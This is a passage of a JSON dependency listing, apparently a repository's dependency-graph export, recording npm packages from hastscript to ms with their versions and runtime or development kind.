age_name":"hastscript@7.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350400,"package_name":"he@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350401,"package_name":"header-case@2.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350402,"package_name":"hookable@5.5.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350403,"package_name":"hosted-git-info@2.8.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350404,"package_name":"html-entities@2.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350405,"package_name":"html-tags@3.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350406,"package_name":"html-void-elements@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350407,"package_name":"http-errors@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350408,"package_name":"http-shutdown@1.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350409,"package_name":"https-proxy-agent@5.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350410,"package_name":"httpxy@0.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350411,"package_name":"human-signals@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350412,"package_name":"human-signals@4.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350413,"package_name":"human-signals@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350414,"package_name":"hyperdyperid@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350427,"package_name":"iconv-lite@0.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350428,"package_name":"icss-utils@5.1.0(postcss@8.4.30)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350429,"package_name":"ignore@5.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350430,"package_name":"immutable@4.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350534,"package_name":"import-fresh@3.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350535,"package_name":"imurmurhash@0.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350536,"package_name":"indent-string@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350537,"package_name":"inflight@1.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350538,"package_name":"inherits@2.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350539,"package_name":"ini@1.3.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350540,"package_name":"ini@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350541,"package_name":"internal-slot@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350542,"package_name":"ioredis@5.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350543,"package_name":"iron-webcrypto@0.8.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350544,"package_name":"is-absolute-url@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350545,"package_name":"is-alphabetical@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350546,"package_name":"is-alphanumerical@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350547,"package_name":"is-arguments@1.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350548,"package_name":"is-array-buffer@3.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350549,"package_name":"is-arrayish@0.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350550,"package_name":"is-bigint@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350551,"package_name":"is-binary-path@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350552,"package_name":"is-boolean-object@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350553,"package_name":"is-buffer@2.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350554,"package_name":"is-builtin-module@3.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350555,"package_name":"is-callable@1.2.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350556,"package_name":"is-core-module@2.13.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350557,"package_name":"is-date-object@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350558,"package_name":"is-decimal@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350559,"package_name":"is-docker@2.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350560,"package_name":"is-docker@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350561,"package_name":"is-expression@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350562,"package_name":"is-extglob@2.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350563,"package_name":"is-fullwidth-code-point@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350564,"package_name":"is-generator-function@1.0.10","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350565,"package_name":"is-glob@4.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350566,"package_name":"is-hexadecimal@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350567,"package_name":"is-inside-container@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350568,"package_name":"is-module@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350569,"package_name":"is-nan@1.3.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350570,"package_name":"is-negative-zero@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350571,"package_name":"is-number-object@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350572,"package_name":"is-number@7.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350573,"package_name":"is-path-inside@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350574,"package_name":"is-plain-obj@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350575,"package_name":"is-plain-object@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350576,"package_name":"is-primitive@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350577,"package_name":"is-promise@2.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350578,"package_name":"is-promise@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350579,"package_name":"is-reference@1.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350580,"package_name":"is-regex@1.1.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350581,"package_name":"is-shared-array-buffer@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350582,"package_name":"is-ssh@1.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350583,"package_name":"is-stream@2.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350584,"package_name":"is-stream@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350585,"package_name":"is-string@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350586,"package_name":"is-symbol@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350587,"package_name":"is-typed-array@1.1.12","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350588,"package_name":"is-weakref@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350589,"package_name":"is-wsl@2.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350590,"package_name":"isarray@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350591,"package_name":"isarray@2.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350592,"package_name":"isexe@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350593,"package_name":"istanbul-lib-coverage@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350594,"package_name":"istanbul-lib-instrument@5.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350595,"package_name":"jackspeak@2.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350596,"package_name":"jest-diff@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350597,"package_name":"jest-get-type@29.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350598,"package_name":"jest-haste-map@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350599,"package_name":"jest-matcher-utils@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350600,"package_name":"jest-message-util@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350601,"package_name":"jest-mock@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350602,"package_name":"jest-regex-util@29.6.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350603,"package_name":"jest-snapshot@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350604,"package_name":"jest-util@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350605,"package_name":"jest-worker@27.5.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350606,"package_name":"jest-worker@29.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350607,"package_name":"jiti@1.20.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350608,"package_name":"js-beautify@1.14.9","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350609,"package_name":"js-stringify@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350610,"package_name":"js-tokens@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350611,"package_name":"js-yaml@3.14.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350612,"package_name":"js-yaml@4.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350613,"package_name":"jsdoc-type-pratt-parser@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350614,"package_name":"jsesc@2.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350615,"package_name":"json-joy@9.5.1(quill-delta@5.1.0)(rxjs@7.8.1)(tslib@2.6.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350656,"package_name":"json-parse-even-better-errors@2.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350657,"package_name":"json-schema-traverse@0.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350658,"package_name":"json-schema-traverse@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350659,"package_name":"json-stable-stringify-without-jsonify@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350660,"package_name":"json5@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350661,"package_name":"json5@2.2.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350662,"package_name":"jsonc-parser@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350663,"package_name":"jsonfile@6.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350664,"package_name":"jstransformer@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350665,"package_name":"kleur@4.1.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350666,"package_name":"klona@2.0.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350667,"package_name":"knitwork@1.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350668,"package_name":"lazystream@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350669,"package_name":"levn@0.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350670,"package_name":"lilconfig@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350671,"package_name":"lines-and-columns@1.2.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350672,"package_name":"linkify-it@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350673,"package_name":"listhen@1.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350674,"package_name":"loader-runner@4.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350675,"package_name":"loader-utils@1.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350676,"package_name":"loader-utils@2.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350677,"package_name":"local-pkg@0.4.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350678,"package_name":"locate-path@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350679,"package_name":"locate-path@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350680,"package_name":"lodash-es@4.17.21","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350681,"package_name":"lodash._reinterpolate@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350682,"package_name":"lodash.clonedeep@4.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350683,"package_name":"lodash.debounce@4.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350684,"package_name":"lodash.defaults@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350685,"package_name":"lodash.escape@4.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350686,"package_name":"lodash.flatten@4.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350687,"package_name":"lodash.invokemap@4.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350688,"package_name":"lodash.isarguments@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350689,"package_name":"lodash.isequal@4.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350690,"package_name":"lodash.memoize@4.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350691,"package_name":"lodash.merge@4.6.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350692,"package_name":"lodash.pick@4.4.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350693,"package_name":"lodash.pullall@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350694,"package_name":"lodash.template@4.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350695,"package_name":"lodash.templatesettings@4.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350696,"package_name":"lodash.uniq@4.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350697,"package_name":"lodash.uniqby@4.7.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350698,"package_name":"lodash@4.17.21","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350699,"package_name":"longest-streak@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350700,"package_name":"loupe@2.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350701,"package_name":"lower-case@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350702,"package_name":"lru-cache@10.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350703,"package_name":"lru-cache@5.1.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350704,"package_name":"lru-cache@6.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350705,"package_name":"magic-string-ast@0.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350706,"package_name":"magic-string@0.30.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350707,"package_name":"make-dir@3.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350708,"package_name":"makeerror@1.0.12","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350709,"package_name":"markdown-it@13.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350710,"package_name":"markdown-table@3.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350711,"package_name":"markdownlint-cli@0.33.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350838,"package_name":"markdownlint@0.27.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350839,"package_name":"mdast-squeeze-paragraphs@5.2.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350840,"package_name":"mdast-util-definitions@5.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350841,"package_name":"mdast-util-find-and-replace@2.2.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350842,"package_name":"mdast-util-from-markdown@1.3.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350843,"package_name":"mdast-util-gfm-autolink-literal@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350844,"package_name":"mdast-util-gfm-footnote@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350845,"package_name":"mdast-util-gfm-strikethrough@1.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350846,"package_name":"mdast-util-gfm-table@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350847,"package_name":"mdast-util-gfm-task-list-item@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350848,"package_name":"mdast-util-gfm@2.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350849,"package_name":"mdast-util-phrasing@3.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350850,"package_name":"mdast-util-to-hast@12.3.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350851,"package_name":"mdast-util-to-markdown@1.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350852,"package_name":"mdast-util-to-string@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350853,"package_name":"mdn-data@2.0.28","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350854,"package_name":"mdn-data@2.0.30","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350855,"package_name":"mdurl@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350856,"package_name":"memfs@3.5.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350857,"package_name":"memfs@4.3.0(quill-delta@5.1.0)(rxjs@7.8.1)(tslib@2.6.1)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350895,"package_name":"memory-fs@0.5.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350896,"package_name":"merge-stream@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350897,"package_name":"merge2@1.4.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350898,"package_name":"micromark-core-commonmark@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350899,"package_name":"micromark-extension-gfm-autolink-literal@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350900,"package_name":"micromark-extension-gfm-footnote@1.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350901,"package_name":"micromark-extension-gfm-strikethrough@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350902,"package_name":"micromark-extension-gfm-table@1.0.7","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350903,"package_name":"micromark-extension-gfm-tagfilter@1.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350904,"package_name":"micromark-extension-gfm-task-list-item@1.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350905,"package_name":"micromark-extension-gfm@2.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350906,"package_name":"micromark-factory-destination@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350907,"package_name":"micromark-factory-label@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350908,"package_name":"micromark-factory-space@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350909,"package_name":"micromark-factory-title@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350910,"package_name":"micromark-factory-whitespace@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350911,"package_name":"micromark-util-character@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350912,"package_name":"micromark-util-chunked@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350913,"package_name":"micromark-util-classify-character@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350914,"package_name":"micromark-util-combine-extensions@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350915,"package_name":"micromark-util-decode-numeric-character-reference@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350916,"package_name":"micromark-util-decode-string@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350917,"package_name":"micromark-util-encode@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350918,"package_name":"micromark-util-html-tag-name@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350919,"package_name":"micromark-util-normalize-identifier@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350920,"package_name":"micromark-util-resolve-all@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350921,"package_name":"micromark-util-sanitize-uri@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350922,"package_name":"micromark-util-subtokenize@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350923,"package_name":"micromark-util-symbol@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350924,"package_name":"micromark-util-types@1.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350925,"package_name":"micromark@3.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350926,"package_name":"micromatch@4.0.5","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350927,"package_name":"mime-db@1.52.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350928,"package_name":"mime-types@2.1.35","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350929,"package_name":"mime@1.6.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350930,"package_name":"mime@2.5.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350931,"package_name":"mime@3.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350932,"package_name":"mimic-fn@2.1.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350933,"package_name":"mimic-fn@4.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350934,"package_name":"min-indent@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350935,"package_name":"mini-css-extract-plugin@2.7.6(webpack@5.88.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350936,"package_name":"minimatch@3.0.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350937,"package_name":"minimatch@3.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350938,"package_name":"minimatch@5.1.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350939,"package_name":"minimatch@9.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870350940,"package_name":"minimatch@9.0.3","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350941,"package_name":"minimist@1.2.8","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350942,"package_name":"minipass@3.3.6","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350943,"package_name":"minipass@5.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870350944,"package_name":"minipass@7.0.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351028,"package_name":"minizlib@2.1.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351029,"package_name":"mkdirp@1.0.4","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351030,"package_name":"mkdist@1.3.0(typescript@5.2.2)","ecosystem":"npm","requirements":null,"direct":false,"kind":"development","optional":false},{"id":13870351031,"package_name":"mlly@1.4.2","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351032,"package_name":"mri@1.2.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351033,"package_name":"mrmime@1.0.1","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351034,"package_name":"ms@2.0.0","ecosystem":"npm","requirements":null,"direct":false,"kind":"runtime","optional":false},{"id":13870351035,"package_name":"ms@2.1.2"